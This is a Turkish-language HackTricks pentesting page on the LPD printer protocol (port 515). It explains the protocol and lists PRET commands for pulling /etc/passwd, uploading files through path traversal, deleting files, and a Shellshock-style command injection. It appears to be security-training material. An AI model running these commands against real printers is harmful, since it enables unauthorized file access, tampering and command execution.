515 - Pentesting Line Printer Daemon (LPD)

AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenmek için htARTE (HackTricks AWS Kırmızı Takım Uzmanı)'a göz atın!

HackTricks'ı desteklemenin diğer yolları:

LPD Protokolüne Giriş

1980'lerde, Line Printer Daemon (LPD) protokolü, daha sonra RFC1179 aracılığıyla resmileştirilen Berkeley Unix'te geliştirildi. Bu protokol, lpr komutu aracılığıyla etkileşim sağlamak için 515/tcp portu üzerinde çalışır. LPD aracılığıyla yazdırma işlemi, bir kontrol dosyası (iş ayrıntılarını ve kullanıcıyı belirtmek için) ile birlikte bir veri dosyası (yazdırma bilgilerini içeren) göndermeyi içerir. Kontrol dosyası, veri dosyası için çeşitli dosya biçimlerinin seçilmesine izin verirken, bu dosyaların işlenmesi belirli LPD uygulamasına bağlıdır. Unix benzeri sistemler için genel olarak kabul gören bir uygulama LPRng'dir. Özellikle, LPD protokolü, zararlı PostScript veya PJL yazdırma işleri yürütmek için sömürülebilir.

LPD Yazıcılarla Etkileşim İçin Araçlar

PRET, LPD uyumlu yazıcılarla etkileşim kurmak için iki temel araç olan lpdprint ve lpdtesti tanıtır. Bu araçlar, veri yazdırma işleminden yazıcı üzerinde dosya manipülasyonuna (indirme, yükleme veya silme gibi) kadar çeşitli eylemleri mümkün kılar:

# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local

Yazıcı hacklemeye ilgi duyan bireyler için kapsamlı bir kaynak burada bulunabilir: Hacking Printers.

Shodan

  • port 515

AWS hacklemeyi sıfırdan kahraman olmaya kadar öğrenin htARTE (HackTricks AWS Red Team Expert)!

HackTricks'i desteklemenin diğer yolları:

Last updated